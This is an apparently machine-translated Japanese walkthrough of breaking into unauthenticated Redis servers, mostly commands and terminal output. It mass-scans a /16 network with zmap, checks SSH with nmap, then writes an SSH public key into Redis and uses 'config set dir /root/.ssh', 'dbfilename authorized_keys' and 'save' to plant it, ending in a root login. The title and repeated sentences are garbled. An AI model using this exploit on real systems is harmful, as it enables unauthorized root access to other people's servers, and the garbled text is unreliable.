Redisはアクセス・ホールの利用を許可していません
1974 ワード
まずzmapという大殺器に乗ってredisサービスをインストールする機械を探して、aaa.bbb.0.0はスキャンを計画するネットワークです.
そしてresults.csvの結果を1つずつ調べて、sshログインできるように注意します.
最後に隠れた環境を探して仕事を始めましたaaabbb.ccc.dddはターゲットアドレスです.
$ zmap -B 1M -p 6379 aaa.bbb.0.0/16 -o results.csv
そしてresults.csvの結果を1つずつ調べて、sshログインできるように注意します.
$ cat results.csv | xargs nmap -p 22
最後に隠れた環境を探して仕事を始めましたaaabbb.ccc.dddはターゲットアドレスです.
[email protected]:~# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Created directory '/root/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
f8:d1:b2:bc:d9:13:13:3d:de:6d:6e:27:bf:28:28:72 [email protected]
The key's randomart image is:
+---[RSA 2048]----+
| |
| |
| . |
| . .. o |
| . S .o o . |
| o +o . . o|
| + .o o |
| . E =.. o +|
| o + .... =+|
+-----------------+
[email protected]:~# (echo -e "
"; cat ~/.ssh/id_rsa.pub; echo -e "
") | redis-cli -h aaa.bbb.ccc.ddd -x set crackit
OK
[email protected]:~# redis-cli -h aaa.bbb.ccc.ddd
aaa.bbb.ccc.ddd:6379> config set dir /root/.ssh/
OK
aaa.bbb.ccc.ddd:6379> config get dir
1) "dir"
2) "/root/.ssh"
aaa.bbb.ccc.ddd:6379> config set dbfilename "authorized_keys"
OK
aaa.bbb.ccc.ddd:6379> save
OK
aaa.bbb.ccc.ddd:6379> exit
[email protected]:~# ssh [email protected]
The authenticity of host 'aaa.bbb.ccc.ddd (aaa.bbb.ccc.ddd)' can't be established.
RSA key fingerprint is 0c:9d:60:e6:24:51:07:4d:93:0f:f3:4e:cb:12:ae:43.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'aaa.bbb.ccc.ddd' (RSA) to the list of known hosts.
Last login: Tue Sep 29 15:20:10 2015 from 202.115.16.136
[[email protected] ~]# pwd
/root